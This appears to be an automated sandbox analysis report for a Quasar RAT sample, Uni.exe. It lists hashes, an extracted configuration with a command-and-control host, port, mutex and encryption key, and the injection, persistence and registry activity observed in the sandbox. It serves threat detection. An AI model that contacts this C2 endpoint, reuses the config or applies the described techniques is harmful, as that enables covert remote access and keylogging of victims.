quasar | 00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3

General

Target

Uni.exe
Size

409KB
MD5

7417c8c73e614f293152575f46134216
SHA1

cc68f7f5e7c769efb5b3e06bfb3a2f9329f37805
SHA256

00c7cb06bebe0da961155dc00f7ea7f96a3b04c89ae82408e7ece6968c91c3c3
SHA512

897a859e609028157f2721d76b97497d4b9f821d2b8be3359d1192ddc3a83d4b7449db25c63c3c260067b796c122194c48747dc611c98dc1e33aab82a20b98b0
SSDEEP

6144:nMr2pJAJcC0B632U3GRbMfgvKFFhTEDPX1NbKoEn5MSU+h2f8/14m:LpyJcC+82U3GRGGp1M5Ys2f8/6m

Score

10^/10

quasar slave spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes

encryption_key
UBXs44u6E81wxBGZxQHk
install_name
$sxr-powershell.exe
log_directory
$SXR-KEYLOGS
reconnect_delay
3000
startup_key
$sxr-powershell
subdirectory
$sxr-seroxen2

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral3/memory/1724-1-0x0000000000C20000-0x0000000000C8C000-memory.dmp	family_quasar
C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description pid process target process

PID 4000 created 616 4000 powershell.EXE winlogon.exe
PID 4048 created 616 4048 powershell.EXE winlogon.exe
Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

$sxr-powershell.exeinstall.exeinstall.exe

pid process

1080 $sxr-powershell.exe
2640 install.exe
1540 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

13 raw.githubusercontent.com
14 raw.githubusercontent.com
23 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

7 ip-api.com

description	pid	process	target process
PID 4000 created 616	4000	powershell.EXE	winlogon.exe
PID 4048 created 616	4048	powershell.EXE	winlogon.exe

pid	process
1080	$sxr-powershell.exe
2640	install.exe
1540	install.exe

flow	ioc
13	raw.githubusercontent.com
14	raw.githubusercontent.com
23	raw.githubusercontent.com

flow	ioc
7	ip-api.com

Drops file in System32 directory 13 IoCs

Processes:

svchost.exepowershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

powershell.EXEpowershell.EXE

description	pid	process	target process
PID 4000 set thread context of 3548	4000	powershell.EXE	dllhost.exe
PID 4048 set thread context of 644	4048	powershell.EXE	dllhost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeSCHTASKS.exeschtasks.exe

pid process

2968 schtasks.exe
4032 SCHTASKS.exe
3928 schtasks.exe

pid	process
2968	schtasks.exe
4032	SCHTASKS.exe
3928	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715200331"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE

Modifies registry class 18 IoCs

Processes:

RuntimeBroker.exeRuntimeBroker.exesihost.exeExplorer.EXE

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\02154e2a-0877-4f75	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = "\\\\?\\Volume{5110105B-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\61ce182754cb053782d39cc890128cbada84ad6c7640c6ba0c541165d6407a54"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = "0"	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = df81a09a86a1da01	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\MostRecentlyUsed	RuntimeBroker.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000223c589986a1da014592719a86a1da014592719a86a1da01530400000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a858d5a32000363163653138323735346362303533373832643339636338393031323863626164613834616436633736343063366261306335343131363564363430376135340000b20009000400efbea858d5a3a858d5a32e0000000000000000000000000000000000000000000000000092303e00360031006300650031003800320037003500340063006200300035003300370038003200640033003900630063003800390030003100320038006300620061006400610038003400610064003600630037003600340030006300360062006100300063003500340031003100360035006400360034003000370061003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea000000180000000300000025e0f5e81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36316365313832373534636230353337383264333963633839303132386362616461383461643663373634306336626130633534313136356436343037613534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a05800000000000000736e667667716c750000000000000000a40a9b40716b2445984d9ed1edd3eb7cd736ae6c2f0def1192f1d6aa8b0874bda40a9b40716b2445984d9ed1edd3eb7cd736ae6c2f0def1192f1d6aa8b0874bdd2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0033003500350038003200390034003800360035002d0033003600370033003800340034003300350034002d0032003200350035003400340034003900330039002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d0000006800000000480000005b101051000000000000d01200000000000000000000000000000000	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\CurrentWorkingDirectory	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System	RuntimeBroker.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"	RuntimeBroker.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880 = "8324"	RuntimeBroker.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4e423a9c-e543-4880	RuntimeBroker.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\PersistedStorageItemTable\ManagedByApp	RuntimeBroker.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEpowershell.EXEdllhost.exedllhost.exe

pid	process
4000	powershell.EXE
4000	powershell.EXE
4048	powershell.EXE
4048	powershell.EXE
4000	powershell.EXE
3548	dllhost.exe
3548	dllhost.exe
3548	dllhost.exe
3548	dllhost.exe
4048	powershell.EXE
3548	dllhost.exe
3548	dllhost.exe
4048	powershell.EXE
3548	dllhost.exe
3548	dllhost.exe
3548	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe
644	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

Uni.exepowershell.EXE$sxr-powershell.exepowershell.EXEdllhost.exedllhost.exedwm.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	1724	Uni.exe
Token: SeDebugPrivilege	4000	powershell.EXE
Token: SeDebugPrivilege	1080	$sxr-powershell.exe
Token: SeDebugPrivilege	4048	powershell.EXE
Token: SeDebugPrivilege	4000	powershell.EXE
Token: SeDebugPrivilege	3548	dllhost.exe
Token: SeDebugPrivilege	4048	powershell.EXE
Token: SeDebugPrivilege	644	dllhost.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	3564	Explorer.EXE
Token: SeCreatePagefilePrivilege	3564	Explorer.EXE
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	3564	Explorer.EXE
Token: SeCreatePagefilePrivilege	3564	Explorer.EXE
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	3564	Explorer.EXE
Token: SeCreatePagefilePrivilege	3564	Explorer.EXE
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	3564	Explorer.EXE
Token: SeCreatePagefilePrivilege	3564	Explorer.EXE
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	60	dwm.exe
Token: SeCreatePagefilePrivilege	60	dwm.exe
Token: SeShutdownPrivilege	3564	Explorer.EXE
Token: SeCreatePagefilePrivilege	3564	Explorer.EXE
Token: SeShutdownPrivilege	3564	Explorer.EXE
Token: SeCreatePagefilePrivilege	3564	Explorer.EXE
Token: SeShutdownPrivilege	3564	Explorer.EXE
Token: SeCreatePagefilePrivilege	3564	Explorer.EXE
Token: SeShutdownPrivilege	3564	Explorer.EXE
Token: SeCreatePagefilePrivilege	3564	Explorer.EXE
Token: SeShutdownPrivilege	3564	Explorer.EXE
Token: SeCreatePagefilePrivilege	3564	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

$sxr-powershell.exe

pid process

1080 $sxr-powershell.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3564 Explorer.EXE

pid	process
1080	$sxr-powershell.exe

pid	process
3564	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Uni.exe$sxr-powershell.exepowershell.EXEdllhost.exelsass.exe

description	pid	process	target process
PID 1724 wrote to memory of 2968	1724	Uni.exe	schtasks.exe
PID 1724 wrote to memory of 2968	1724	Uni.exe	schtasks.exe
PID 1724 wrote to memory of 2968	1724	Uni.exe	schtasks.exe
PID 1724 wrote to memory of 1080	1724	Uni.exe	$sxr-powershell.exe
PID 1724 wrote to memory of 1080	1724	Uni.exe	$sxr-powershell.exe
PID 1724 wrote to memory of 1080	1724	Uni.exe	$sxr-powershell.exe
PID 1724 wrote to memory of 2640	1724	Uni.exe	install.exe
PID 1724 wrote to memory of 2640	1724	Uni.exe	install.exe
PID 1724 wrote to memory of 2640	1724	Uni.exe	install.exe
PID 1724 wrote to memory of 4032	1724	Uni.exe	SCHTASKS.exe
PID 1724 wrote to memory of 4032	1724	Uni.exe	SCHTASKS.exe
PID 1724 wrote to memory of 4032	1724	Uni.exe	SCHTASKS.exe
PID 1080 wrote to memory of 3928	1080	$sxr-powershell.exe	schtasks.exe
PID 1080 wrote to memory of 3928	1080	$sxr-powershell.exe	schtasks.exe
PID 1080 wrote to memory of 3928	1080	$sxr-powershell.exe	schtasks.exe
PID 1080 wrote to memory of 1540	1080	$sxr-powershell.exe	install.exe
PID 1080 wrote to memory of 1540	1080	$sxr-powershell.exe	install.exe
PID 1080 wrote to memory of 1540	1080	$sxr-powershell.exe	install.exe
PID 4000 wrote to memory of 3548	4000	powershell.EXE	dllhost.exe
